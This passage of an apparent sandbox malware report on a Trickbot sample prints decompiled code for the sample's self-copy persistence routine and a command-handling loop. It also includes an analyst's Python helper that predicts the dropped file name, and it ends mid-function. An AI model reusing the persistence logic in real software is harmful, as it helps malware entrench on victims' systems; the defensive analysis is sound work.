                          • Opcode ID: 2044aee47ba0e31ed32f1160117e5a6fe41a6145609d3f0922eadb5a69cd434f
                          • Instruction ID: 6d52b9ac3414b97ca40a9e251bb8ac95012188f33d3c9afaac67011031a2696b
                          • Opcode Fuzzy Hash: 2044aee47ba0e31ed32f1160117e5a6fe41a6145609d3f0922eadb5a69cd434f
                          • Instruction Fuzzy Hash: 9A419D715043059FD730AFA4EC49F9BBBA9BF84308F14493EE889D72A1E7719854CB62
                          Uniqueness

                          Uniqueness Score: -1.00%
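As read from the decompiled E005C3EC0 that follows: the input path is split at its last backslash; a lowercased copy of the full path is searched for the UTF-16 words 0x790073, 0x740073 and 0x6d0065 ("sy", "st", "em"), and if they are found, or if the path is 0x11 characters or shorter, the handle passed to the next call is set to -1; the function pointer at 0x5d9de4 is then called with (0, 0x1a, handle, 0, buffer), an argument pattern that matches SHGetFolderPathW with CSIDL_APPDATA (0x1a), although the report does not resolve that pointer; CreateDirectoryW creates a subfolder whose name comes from the E005D4520(..., 0x4d) call; the file name is rewritten character by character and the copy is attempted with CopyFileW, retried three times with SleepEx(0x3e8) between attempts, and lstrcmpiW against the resolved folder skips the copy when the file already runs from there. The example below is mine, not the report's or the sample's code, and reproduces only the name rewriting and target path assembly so that an analyst can predict the dropped file name from the launched one. The three character ranges and the +2 shift come from the comparisons in the loop (0x49 with width 0xe, 0x35 with width 3, 0x6b with width 9, and _t143 = _t150 + 2); the ".exe" literal comes from the two dwords 0x65002e and 0x650078. The subfolder name is a caller-supplied placeholder because the decrypted string is not shown on this page.

```python
# Ranges taken from the three comparisons in the decompiled E005C3EC0:
#   (c - 0x49) & 0xffff < 0xe   -> 'I'..'V'
#   (c - 0x35) & 0xffff < 3     -> '5'..'7'
#   (c - 0x6b) & 0xffff < 9     -> 'k'..'s'
# A character in any of these ranges is replaced by the character two code
# points higher (_t143 = _t150 + 2 in the decompilation).
SHIFT_RANGES = ((0x49, 0xE), (0x35, 3), (0x6B, 9))
SHIFT = 2


def shift_char(c: str) -> str:
    """Apply the per-character substitution of the name-building loop."""
    code = ord(c)
    for base, width in SHIFT_RANGES:
        if ((code - base) & 0xFFFF) < width:   # same 16-bit unsigned compare as the decompilation
            return chr(code + SHIFT)
    return c


def mangle_file_name(name: str) -> str:
    """Rewrite a file name the way the loop does: characters are shifted until
    the first '.', where the literal ".exe" (0x65002e, 0x650078 as UTF-16 dwords)
    is written and the loop stops, so anything after the first '.' is dropped.
    A name without a '.' gets no extension at all, matching the decompiled
    break on the terminating NUL."""
    out = []
    for c in name:
        if c == ".":
            out.append(".exe")
            break
        out.append(shift_char(c))
    return "".join(out)


def install_path(appdata_dir: str, folder: str, original_path: str) -> str:
    """Assemble <appdata>\\<folder>\\<mangled name>, mirroring the CreateDirectoryW
    target and the CopyFileW destination built in the function.
    `folder` stands in for the decrypted string (E005D4520(..., 0x4d)) that this
    report page does not show; it is a placeholder, not a value recovered from
    the sample."""
    file_name = original_path.rsplit("\\", 1)[-1]   # same split as the backslash scan in the function
    return f"{appdata_dir}\\{folder}\\{mangle_file_name(file_name)}"


if __name__ == "__main__":
    # Constructed inputs; the first is the analyst-assigned name of this sample.
    for name in ("2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe",
                 "Trickbot.exe", "report.pdf.exe", "noext"):
        print(f"{name} -> {mangle_file_name(name)}")
```

The rewrite is not reversible in general (a "u" in a dropped name may have been an "s" or an original "u"), so hunting from a file found in %APPDATA% back to the original name needs the candidate set rather than a single string; predicting forward from a known launched name, as above, is exact.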

                          C-Code - Quality: 77%
                          			E005C3EC0(void* __edx, void* __eflags) {
                          				void* __edi;
                          				intOrPtr _t82;
                          				intOrPtr _t83;
                          				WCHAR* _t84;
                          				intOrPtr _t85;
                          				intOrPtr _t86;
                          				void* _t87;
                          				WCHAR* _t94;
                          				void* _t96;
                          				signed int _t99;
                          				signed short* _t106;
                          				int* _t107;
                          				signed short* _t109;
                          				signed short* _t110;
                          				signed short* _t113;
                          				intOrPtr _t122;
                          				signed int _t125;
                          				WCHAR* _t132;
                          				short* _t133;
                          				WCHAR* _t135;
                          				void* _t137;
                          				void* _t138;
                          				void* _t139;
                          				signed int _t140;
                          				signed short** _t141;
                          				void* _t143;
                          				void* _t144;
                          				signed short* _t149;
                          				signed short _t150;
                          				signed int _t157;
                          				signed int _t159;
                          				intOrPtr* _t162;
                          				intOrPtr _t169;
                          				WCHAR* _t170;
                          				signed int _t171;
                          				intOrPtr* _t172;
                          				signed int _t173;
                          				intOrPtr _t174;
                          				signed int* _t175;
                          				void* _t177;
                          				void* _t178;
                          				void* _t179;
                          				WCHAR** _t183;
                          				signed short* _t184;
                          				signed short** _t185;
                          				void* _t186;
                          				void* _t187;
                          				intOrPtr* _t188;
                          				intOrPtr* _t189;
                          				void* _t190;
                          				void* _t191;
                          				intOrPtr* _t192;
                          				void* _t193;
                          				short _t218;
                          
                          				_t169 =  *((intOrPtr*)(_t186 + 0x464));
                          				_t137 = _t186 + 0x18;
                          				_t171 = 0;
                          				 *((intOrPtr*)(_t186 + 0xc)) = 0;
                          				 *((intOrPtr*)(_t186 + 4)) = 0;
                          				 *((intOrPtr*)(_t186 + 0x14)) = 0;
                          				E005D43C0(_t137, __edx, __eflags);
                          				if(_t169 == 0) {
                          					L3:
                          					_t172 = _t186 + 4;
                          					E005CAE30(_t172, _t186 + 8);
                          					_t187 = _t186 + 8;
                          					_t82 =  *_t172;
                          				} else {
                          					while( *((short*)(_t169 + _t171 * 2)) != 0) {
                          						_t171 = _t171 + 1;
                          						if(_t171 != 0x800) {
                          							continue;
                          						} else {
                          							goto L3;
                          						}
                          						goto L5;
                          					}
                          					_t82 = E005CB7A0(_t169);
                          					_t187 = _t186 + 4;
                          					 *((intOrPtr*)(_t187 + 4)) = _t82;
                          					 *(_t187 + 8) = _t171;
                          				}
                          				L5:
                          				_t83 = E005CB7A0(_t82);
                          				_t188 = _t187 + 4;
                          				_t173 =  *(_t188 + 8);
                          				 *_t188 = _t83;
                          				_t184 = _t83 + _t173 * 2;
                          				_t84 = E005CB7A0( *((intOrPtr*)(_t188 + 4)));
                          				_t189 = _t188 + 4;
                          				_t170 = _t84;
                          				if(_t173 <= 0) {
                          					_t174 =  *_t189;
                          				} else {
                          					_t174 =  *_t189;
                          					while(( *_t184 & 0x0000ffff) != 0x5c) {
                          						_t184 =  &(_t184[0xffffffffffffffff]);
                          						if(_t184 > _t174) {
                          							continue;
                          						} else {
                          						}
                          						goto L12;
                          					}
                          					 *_t184 = 0;
                          					_t184 =  &(_t184[1]);
                          					__eflags = _t184;
                          				}
                          				L12:
                          				_t85 = E005CB7A0(_t174);
                          				_t190 = _t189 + 4;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x468)))) = _t85;
                          				_t86 = E005CB7A0( *((intOrPtr*)(_t190 + 4)));
                          				_t191 = _t190 + 4;
                          				_t147 =  *((intOrPtr*)(_t191 + 0x46c));
                          				 *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x46c)))) = _t86;
                          				_push(_t137);
                          				_push(_t174);
                          				_t87 = E005CC7C0();
                          				_t192 = _t191 + 8;
                          				_t138 = 0;
                          				if(_t87 == 0) {
                          					if( *0x5d9ae8 == 0) {
                          						_t94 =  *(_t192 + 0xc);
                          					} else {
                          						_t183 = _t192 + 0xc;
                          						_push(_t183);
                          						E005C8CD0(_t147);
                          						_t192 = _t192 + 4;
                          						_t94 =  *_t183;
                          						if(_t94 != 0) {
                          							_t174 =  *_t192;
                          						} else {
                          							_t174 =  *_t192;
                          							if( *((intOrPtr*)(_t192 + 8)) != 0) {
                          								_t159 =  *_t170 & 0x0000ffff;
                          								_t132 = _t170;
                          								if(_t159 != 0) {
                          									_t135 = _t170;
                          									do {
                          										if((_t159 - 0x00000041 & 0x0000ffff) <= 0x19) {
                          											 *_t135 = _t159 + 0x20;
                          										}
                          										_t159 = _t135[1] & 0x0000ffff;
                          										_t135 =  &(_t135[1]);
                          									} while (_t159 != 0);
                          								}
                          								_t133 =  &(_t132[0xfffffffffffffffa]);
                          								while(_t133 > _t170) {
                          									__eflags =  *_t133 - 0x790073;
                          									if( *_t133 != 0x790073) {
                          										L25:
                          										_t133 =  &(_t133[0xffffffffffffffff]);
                          										__eflags = _t133;
                          										continue;
                          									} else {
                          										__eflags = _t133[2] - 0x740073;
                          										if(_t133[2] != 0x740073) {
                          											goto L25;
                          										} else {
                          											__eflags = _t133[4] - 0x6d0065;
                          											if(_t133[4] == 0x6d0065) {
                          												L28:
                          												 *(_t192 + 0xc) = 0xffffffff;
                          												_t94 = 0xffffffffffffffff;
                          											} else {
                          												goto L25;
                          											}
                          										}
                          									}
                          									goto L31;
                          								}
                          								_t94 = 0;
                          								if( *((intOrPtr*)(_t192 + 8)) <= 0x11) {
                          									goto L28;
                          								}
                          							}
                          						}
                          					}
                          					L31:
                          					_t162 =  *0x5d9de4;
                          					_t149 = 0;
                          					_t139 = _t192 + 0x40;
                          					 *(_t192 + 0x10) = 0;
                          					while(1) {
                          						L33:
                          						_push(_t139);
                          						_push(_t149);
                          						_push(_t94);
                          						_push(0x1a);
                          						_push(_t149);
                          						if( *_t162() >= 0) {
                          							goto L35;
                          						}
                          						_t138 = 0;
                          						_push(_t192 + 0x40);
                          						_push(0);
                          						_push(0xffffffff);
                          						_push(0x1a);
                          						_push(0);
                          						if( *0x5d9de4() >= 0) {
                          							goto L35;
                          						}
                          						goto L74;
                          						L35:
                          						_t96 =  *(_t192 + 0xc);
                          						if(_t96 != 0) {
                          							CloseHandle(_t96);
                          						}
                          						if( *(_t192 + 0x40) == 0) {
                          							_t140 = 0;
                          							__eflags = 0;
                          							_t175 = _t192 + 0x40;
                          						} else {
                          							_t144 = 0;
                          							_t178 = _t192 + 0x40;
                          							do {
                          								_t144 = _t144 + 1;
                          								_t218 =  *((short*)(_t178 + 2));
                          								_t178 = _t178 + 2;
                          							} while (_t218 != 0);
                          						}
                          						if(_t140 >=  *((intOrPtr*)(_t192 + 8))) {
                          							L44:
                          							E005D4520(_t192 + 0x24c, 0x4d);
                          							_t193 = _t192 + 8;
                          							_t99 =  *(_t193 + 0x248) & 0x0000ffff;
                          							 *_t175 = _t99;
                          							if(_t99 != 0) {
                          								_t125 = 0;
                          								do {
                          									_t157 =  *(_t193 + 0x24a + _t125 * 2) & 0x0000ffff;
                          									 *(_t175 + 2 + _t125 * 2) = _t157;
                          									_t125 = _t125 + 1;
                          								} while (_t157 != 0);
                          								_t140 = _t140 + _t125;
                          							}
                          							CreateDirectoryW(_t193 + 0x44, 0);
                          							_t170 = E005C3180(_t140 + _t140 + 0x208, _t170);
                          							E005CC400(_t170, _t193 + 0x44, _t140 + _t140 + 2);
                          							_t192 = _t193 + 0x14;
                          							_t58 = _t140 * 2; // 0xa
                          							_t106 = _t170 + _t58 + 0xa;
                          							 *((intOrPtr*)(_t106 - 0xa)) = 0x5c;
                          							while(1) {
                          								_t150 =  *_t184 & 0x0000ffff;
                          								if(_t150 == 0) {
                          									break;
                          								}
                          								if((_t150 & 0x0000ffff) != 0x2e) {
                          									_t143 = _t150 + 2;
                          									__eflags = (_t150 - 0x00000049 & 0x0000ffff) - 0xe;
                          									_t154 =  <  ? _t143 : _t150;
                          									__eflags = (_t150 - 0x00000035 & 0x0000ffff) - 3;
                          									_t155 =  <  ? _t143 :  <  ? _t143 : _t150;
                          									__eflags = (_t150 - 0x0000006b & 0x0000ffff) - 9;
                          									_t156 =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
                          									_t184 =  &(_t184[1]);
                          									 *((short*)(_t106 - 8)) =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
                          									_t106 =  &(_t106[1]);
                          									__eflags = _t106;
                          									continue;
                          								} else {
                          									 *((intOrPtr*)(_t106 - 8)) = 0x65002e;
                          									 *((intOrPtr*)(_t106 - 4)) = 0x650078;
                          								}
                          								L54:
                          								_t177 = 0xfffffffd;
                          								_t139 = _t192 + 0x40;
                          								 *_t107 = 0;
                          								while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
                          									SleepEx(0x3e8, 0);
                          									_t177 = _t177 + 1;
                          									if(_t177 != 0) {
                          										continue;
                          									} else {
                          										if( *((intOrPtr*)( *0x5d9c88)) == 0) {
                          											L67:
                          											if( *(_t192 + 0x10) == 0) {
                          												_t174 =  *_t192;
                          												_t162 =  *0x5d9de4;
                          												 *(_t192 + 0xc) = 0xffffffff;
                          												_t94 = 0xffffffffffffffff;
                          												 *(_t192 + 0x10) = 1;
                          												_t149 = 0;
                          												__eflags = 0;
                          												goto L33;
                          											} else {
                          												goto L68;
                          											}
                          										} else {
                          											_push(_t192 + 0x14);
                          											if( *0x5d9c88() == 0) {
                          												goto L67;
                          											} else {
                          												_t179 = 3;
                          												while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
                          													SleepEx(0x3e8, 0);
                          													_t179 = _t179 - 1;
                          													if(_t179 != 0) {
                          														continue;
                          													} else {
                          														_t179 = 0;
                          													}
                          													break;
                          												}
                          												_t122 =  *((intOrPtr*)(_t192 + 0x14));
                          												if(_t122 != 0 &&  *((intOrPtr*)( *0x5d9c78)) != 0) {
                          													 *0x5d9c78(_t122);
                          												}
                          												if(_t179 != 0) {
                          													break;
                          												} else {
                          													goto L67;
                          												}
                          											}
                          										}
                          									}
                          									goto L74;
                          								}
                          								_t185 =  *(_t192 + 0x468);
                          								_t109 =  *_t185;
                          								__eflags = _t109;
                          								if(_t109 != 0) {
                          									E005C91E0(_t109);
                          									_t192 = _t192 + 4;
                          								}
                          								_t141 =  *(_t192 + 0x46c);
                          								_t174 =  *_t192;
                          								_t110 =  *_t141;
                          								__eflags = _t110;
                          								if(_t110 != 0) {
                          									E005C91E0(_t110);
                          									_t192 = _t192 + 4;
                          								}
                          								 *_t185 = E005CB7A0(_t192 + 0x40);
                          								_t113 = E005CB7A0(_t170);
                          								_t192 = _t192 + 8;
                          								 *_t141 = _t113;
                          								_t138 = 1;
                          								__eflags = 1;
                          								goto L74;
                          							}
                          							_t107 =  &(_t106[0xfffffffffffffffc]);
                          							__eflags = _t107;
                          							goto L54;
                          						} else {
                          							_t170[_t140] = 0;
                          							if(lstrcmpiW(_t170, _t192 + 0x40) == 0) {
                          								L68:
                          								_t174 =  *_t192;
                          								_t138 = 0;
                          							} else {
                          								goto L44;
                          							}
                          						}
                          						goto L74;
                          					}
                          				}
                          				L74:
                          				_t88 =  *((intOrPtr*)(_t192 + 4));
                          				if( *((intOrPtr*)(_t192 + 4)) != 0) {
                          					E005C91E0(_t88);
                          					_t192 = _t192 + 4;
                          				}
                          				if(_t174 != 0) {
                          					E005C91E0(_t174);
                          					_t192 = _t192 + 4;
                          				}
                          				if(_t170 != 0) {
                          					E005C91E0(_t170);
                          					_t192 = _t192 + 4;
                          				}
                          				E005D16C0(_t192 + 0x18, _t170);
                          				return _t138;
                          			}

                          APIs
                            • Part of subcall function 005D43C0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9BBC,00000800,00000000,?,00000000,?,005C962D,?,?,?,?,?,00000000,00000000,00000000,?), ref: 005D43F6
                          • SHGetFolderPathW.SHELL32(00000000,0000001A,000000FF,00000000,?), ref: 005C408D
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 005C40A4
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 005C40DD
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 005C412F
                          • CopyFileW.KERNEL32(?,00000000,00000000), ref: 005C41CF
                          • SleepEx.KERNEL32(000003E8,00000000), ref: 005C41E4
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 005C41FC
                          • CopyFileW.KERNEL32(?,00000000,00000000), ref: 005C4212
                          • SleepEx.KERNEL32(000003E8,00000000), ref: 005C4223
                          • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 005C4242
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Wow64$CopyFileRedirectionSleep$CloseCountCreateCriticalDirectoryDisableFolderFreeHandleHeapInitializePathRevertSectionSpinlstrcmpi
                          • String ID:
                          • API String ID: 1225154383-0
                          • Opcode ID: 892dd195a6c44f18e98fb77022a160fa715edf48b09740a3cdc641e22ae088fa
                          • Instruction ID: b0cab4b6cca8cc35bb3d8758ea6dc526eb0d853b0c4e97d333bbdcb5e1e0ea5a
                          • Opcode Fuzzy Hash: 892dd195a6c44f18e98fb77022a160fa715edf48b09740a3cdc641e22ae088fa
                          • Instruction Fuzzy Hash: 3FC1CEB59043119FDB209FA4DC99F6A7BE8FF90310F04892DF9859B291E734D948CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E005D1A70(intOrPtr __ecx) {
                          				signed int _t166;
                          				signed int _t167;
                          				signed int _t168;
                          				signed int _t169;
                          				signed int _t170;
                          				void* _t171;
                          				signed int _t172;
                          				void* _t177;
                          				signed int _t178;
                          				int _t194;
                          				WCHAR** _t202;
                          				WCHAR** _t207;
                          				signed int _t212;
                          				intOrPtr _t216;
                          				int _t222;
                          				signed int _t224;
                          				void* _t241;
                          				signed int _t243;
                          				signed int _t245;
                          				signed int _t246;
                          				intOrPtr _t251;
                          				void* _t256;
                          				signed int _t258;
                          				signed int _t261;
                          				signed int _t262;
                          				signed int _t265;
                          				signed int _t269;
                          				signed int _t271;
                          				intOrPtr _t277;
                          				void* _t279;
                          				signed int _t281;
                          				signed int _t282;
                          				signed int _t283;
                          				intOrPtr _t284;
                          				void* _t286;
                          				signed int _t287;
                          				WCHAR* _t288;
                          				signed int _t289;
                          				void* _t290;
                          				WCHAR* _t292;
                          				WCHAR** _t293;
                          				signed int _t295;
                          				intOrPtr _t298;
                          				void* _t299;
                          				signed int _t300;
                          				intOrPtr* _t301;
                          				intOrPtr* _t303;
                          
                          				if( *((intOrPtr*)(__ecx)) <= 0) {
                          					L79:
                          					return 1;
                          				} else {
                          					_t166 = 1;
                          					_t286 = 0;
                          					_t243 = 0;
                          					 *_t303 = __ecx;
                          					do {
                          						 *(_t303 + 0x10) = _t243;
                          						if((_t166 & 0x00000001) == 0) {
                          							_t167 =  *_t286;
                          							__eflags = _t167;
                          							if(_t167 != 0) {
                          								E005C91E0(_t167);
                          								_t303 = _t303 + 4;
                          							}
                          							_t168 =  *(_t286 + 4);
                          							__eflags = _t168;
                          							if(_t168 != 0) {
                          								E005C91E0(_t168);
                          								_t303 = _t303 + 4;
                          							}
                          							_t169 =  *(_t286 + 8);
                          							__eflags = _t169;
                          							if(_t169 != 0) {
                          								E005C91E0(_t169);
                          								_t303 = _t303 + 4;
                          							}
                          							_t170 =  *(_t286 + 0x10);
                          							__eflags = _t170;
                          							if(_t170 != 0) {
                          								E005C91E0(_t170);
                          								_t303 = _t303 + 4;
                          							}
                          							_t171 = _t286;
                          							_t31 = _t286 + 4; // 0x4
                          							_t287 = _t286 + 8;
                          							_t33 = _t171 + 0x10; // 0x10
                          							_t34 = _t171 + 0xc; // 0xc
                          							_t290 = _t34;
                          							_t299 = _t171;
                          							_t172 =  *(_t171 + 0xc);
                          							 *(_t303 + 4) = _t31;
                          							 *(_t303 + 0xc) = _t33;
                          							__eflags = _t172;
                          							if(_t172 != 0) {
                          								E005C91E0(_t172);
                          								_t303 = _t303 + 4;
                          							}
                          							_t245 = _t287;
                          							_t286 = _t299;
                          						} else {
                          							_t241 = E005C3180(0x1c, 0);
                          							_t303 = _t303 + 8;
                          							_t286 = _t241;
                          							_t22 = _t241 + 0xc; // 0xc
                          							_t290 = _t22;
                          							_t24 = _t286 + 4; // 0x4
                          							 *(_t303 + 0xc) = _t241 + 0x10;
                          							_t26 = _t286 + 8; // 0x8
                          							_t245 = _t26;
                          							 *(_t303 + 4) = _t24;
                          						}
                          						_t277 =  *_t303;
                          						_t300 =  *(_t303 + 0x10);
                          						 *((intOrPtr*)(_t286 + 0x18)) = 0;
                          						 *((intOrPtr*)(_t286 + 0x14)) = 0;
                          						 *(_t286 + 0x10) = 0;
                          						 *((intOrPtr*)(_t286 + 0xc)) = 0;
                          						 *(_t286 + 8) = 0;
                          						 *(_t286 + 4) = 0;
                          						 *_t286 = 0;
                          						_t48 = _t286 + 0x14; // 0x14
                          						 *(_t303 + 0x14) = _t245;
                          						_t177 = E005CB3F0( *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4)),  *(_t303 + 0x14), _t245,  *(_t303 + 0x14), _t48, _t290);
                          						_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4));
                          						if(_t177 == 0) {
                          							_t178 = E005C22A0(_t251);
                          							__eflags = _t178;
                          							if(_t178 == 0) {
                          								_t301 =  *_t303;
                          								_t246 =  *(_t303 + 0x10);
                          								_push( *( *(_t301 + 4) + _t246 * 4));
                          								_t178 = E005D3360();
                          								__eflags = _t178;
                          								 *_t286 = _t178;
                          								if(_t178 != 0) {
                          									_push(_t286);
                          									_t178 = E005D4EA0(_t301);
                          								}
                          								goto L66;
                          							}
                          							_t246 =  *(_t303 + 0x10);
                          							goto L33;
                          						} else {
                          							_push(_t251);
                          							_t178 = E005D3360();
                          							_t292 = _t303 + 0x1c;
                          							 *(_t303 + 0xc) = _t286;
                          							 *_t286 = _t178;
                          							if(_t178 == 0) {
                          								_t246 =  *(_t303 + 0x10);
                          								_t301 =  *_t303;
                          								_t286 =  *(_t303 + 0xc);
                          								goto L66;
                          							}
                          							_t288 = _t292;
                          							E005D4520(_t292, 0x96);
                          							_t303 = _t303 + 8;
                          							_t293 =  *(_t303 + 8);
                          							if(lstrcmpiW( *_t293, _t292) == 0) {
                          								_t301 =  *_t303;
                          								_t286 =  *(_t303 + 0xc);
                          								_push(_t286);
                          								_t178 = E005C4C20(_t301);
                          								_t246 =  *(_t303 + 0x10);
                          								goto L66;
                          							}
                          							E005D4520(_t288, 0x97);
                          							_t303 = _t303 + 8;
                          							_t194 = lstrcmpiW( *_t293, _t288);
                          							_t246 =  *(_t303 + 0x10);
                          							_t286 =  *(_t303 + 0xc);
                          							if(_t194 == 0) {
                          								_t301 =  *_t303;
                          								_push(_t286);
                          								E005D4EA0(_t301);
                          								__eflags = _t246;
                          								_t178 = 0 | _t246 > 0x00000000;
                          								_t246 = _t246 - _t178;
                          								goto L66;
                          							}
                          							E005D4520(_t303 + 0x20, 0x98);
                          							_t303 = _t303 + 8;
                          							if(lstrcmpiW( *_t293, _t303 + 0x1c) == 0) {
                          								_t178 =  *( *(_t303 + 8));
                          								__eflags = _t178;
                          								if(_t178 == 0) {
                          									L33:
                          									_t301 =  *_t303;
                          									goto L66;
                          								}
                          								__eflags =  *_t178;
                          								if( *_t178 == 0) {
                          									goto L33;
                          								}
                          								_t301 =  *_t303;
                          								_t279 = 1;
                          								__eflags = 1;
                          								while(1) {
                          									_t91 = _t279 + 1; // 0x2
                          									_t256 = _t91;
                          									__eflags = _t279 - 0x1ff;
                          									if(_t279 > 0x1ff) {
                          										break;
                          									}
                          									__eflags =  *(_t178 + _t279);
                          									_t279 = _t256;
                          									if(__eflags != 0) {
                          										continue;
                          									}
                          									break;
                          								}
                          								_t93 = _t256 - 2; // 0x0
                          								__eflags = _t93 - 0x1fe;
                          								if(_t93 > 0x1fe) {
                          									goto L66;
                          								}
                          								_t202 = E005C7400(_t178, _t256 - 1);
                          								_t303 = _t303 + 8;
                          								 *(_t303 + 8) = _t202;
                          								_t178 =  *( *(_t301 + 4) + _t246 * 4);
                          								_t258 =  *(_t178 + 0x58);
                          								 *(_t303 + 0x14) = _t178;
                          								__eflags = _t258;
                          								if(_t258 <= 0) {
                          									_t281 = 0;
                          									__eflags = 0;
                          									L3:
                          									__eflags = _t281 - _t258;
                          									if(_t281 != _t258) {
                          										goto L66;
                          									}
                          									_t178 = E005C3180(8 + _t258 * 8,  *((intOrPtr*)( *(_t303 + 0x14) + 0x54)));
                          									_t303 = _t303 + 8;
                          									_t282 = 0;
                          									__eflags = _t178;
                          									if(_t178 != 0) {
                          										_t269 =  *(_t301 + 4);
                          										_t284 =  *((intOrPtr*)(_t269 + _t246 * 4));
                          										 *(_t303 + 0x14) = _t269;
                          										 *(_t178 +  *(_t284 + 0x58) * 4) =  *(_t303 + 8);
                          										 *(_t284 + 0x54) = _t178;
                          										_t282 = 0;
                          										_t178 =  *( *(_t303 + 0x14) + _t246 * 4);
                          										_t17 = _t178 + 0x58;
                          										 *_t17 =  *(_t178 + 0x58) + 1;
                          										__eflags =  *_t17;
                          									}
                          									_t295 = 0xffffffffffffffff;
                          									_t261 = 1;
                          									L55:
                          									if(_t261 == 0 ||  *0x5d9c24 > 0x31) {
                          										goto L66;
                          									} else {
                          										 *((intOrPtr*)(_t286 + 0x18)) =  *((intOrPtr*)(_t303 + 0xf8));
                          										 *(_t303 + 8) = _t282;
                          										_t207 = E005CB7A0( *( *(_t303 + 4)));
                          										_t303 = _t303 + 4;
                          										 *(_t303 + 8) = _t207;
                          										_t178 = CreateThread(0, 0, E005D13A0, _t286, 0, _t303 + 0x18);
                          										if( *(_t303 + 4) == 0) {
                          											L65:
                          											_t286 = 0;
                          											goto L66;
                          										}
                          										_t211 =  *( *(_t301 + 4) + _t246 * 4);
                          										_t262 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
                          										if(_t295 < 0 || _t295 >= _t262) {
                          											_t212 = E005C3180(8 + _t262 * 8,  *((intOrPtr*)(_t211 + 0x4c)));
                          											_t303 = _t303 + 8;
                          											__eflags = _t212;
                          											if(_t212 == 0) {
                          												goto L63;
                          											}
                          											_t289 = _t212;
                          											 *(_t289 +  *( *( *(_t301 + 4) + _t246 * 4) + 0x50) * 8) =  *(_t303 + 8);
                          											_t216 = E005D4E70();
                          											_t265 =  *(_t301 + 4);
                          											_t283 =  *(_t265 + _t246 * 4);
                          											 *((intOrPtr*)(_t289 + 4 +  *(_t283 + 0x50) * 8)) = _t216;
                          											 *(_t283 + 0x4c) = _t289;
                          											_t178 =  *(_t265 + _t246 * 4);
                          											 *((intOrPtr*)(_t178 + 0x50)) =  *((intOrPtr*)(_t178 + 0x50)) + 1;
                          										} else {
                          											 *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) = E005D4E70();
                          											L63:
                          											_t178 =  *(_t303 + 8);
                          											if(_t178 != 0) {
                          												_t178 = E005C91E0(_t178);
                          												_t303 = _t303 + 4;
                          											}
                          										}
                          										goto L65;
                          									}
                          								}
                          								_t298 =  *((intOrPtr*)(_t178 + 0x54));
                          								_t281 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_t178 =  *(_t303 + 8);
                          									__eflags =  *((intOrPtr*)(_t298 + _t281 * 4)) - _t178;
                          									if( *((intOrPtr*)(_t298 + _t281 * 4)) == _t178) {
                          										goto L3;
                          									}
                          									_t281 = _t281 + 1;
                          									__eflags = _t281 - _t258;
                          									if(_t281 < _t258) {
                          										continue;
                          									}
                          									goto L3;
                          								}
                          								goto L3;
                          							}
                          							E005D4520(_t303 + 0x20, 0x6a);
                          							_t303 = _t303 + 8;
                          							_t222 = lstrcmpiW( *_t293, _t303 + 0x1c);
                          							_t301 =  *_t303;
                          							if(_t222 == 0) {
                          								L27:
                          								_t295 = 0;
                          								_t271 =  *( *(_t301 + 4) + _t246 * 4);
                          								_t224 =  *(_t271 + 0x50);
                          								if(_t224 <= 0) {
                          									L51:
                          									if(_t295 >= _t224) {
                          										_t178 = 1;
                          										__eflags = 1;
                          										_t261 = 1;
                          									} else {
                          										_t261 = 0 | E005D4E70() -  *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) - 0x00000707 > 0x00000000;
                          										_t178 = 1;
                          									}
                          									_t282 = _t178;
                          									goto L55;
                          								}
                          								while(lstrcmpiW( *( *((intOrPtr*)(_t271 + 0x4c)) + _t295 * 8),  *( *(_t303 + 4))) != 0) {
                          									_t295 = _t295 + 1;
                          									_t271 =  *( *(_t301 + 4) + _t246 * 4);
                          									_t224 =  *(_t271 + 0x50);
                          									if(_t295 < _t224) {
                          										continue;
                          									}
                          									goto L51;
                          								}
                          								_t224 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
                          								goto L51;
                          							}
                          							 *(_t303 + 0x1c) = 0x44;
                          							_t178 = lstrcmpiW( *( *(_t303 + 8)), _t303 + 0x1c);
                          							_t282 = 0;
                          							_t295 = 0xffffffff;
                          							_t261 = 1;
                          							if(_t178 != 0) {
                          								goto L55;
                          							}
                          							goto L27;
                          						}
                          						L66:
                          						_t243 = _t246 + 1;
                          						_t166 = _t178 & 0xffffff00 | _t286 == 0x00000000;
                          					} while (_t243 <  *_t301);
                          					if(_t286 != 0) {
                          						_t180 =  *_t286;
                          						if( *_t286 != 0) {
                          							E005C91E0(_t180);
                          							_t303 = _t303 + 4;
                          						}
                          						_t181 =  *(_t286 + 4);
                          						if( *(_t286 + 4) != 0) {
                          							E005C91E0(_t181);
                          							_t303 = _t303 + 4;
                          						}
                          						_t182 =  *(_t286 + 8);
                          						if( *(_t286 + 8) != 0) {
                          							E005C91E0(_t182);
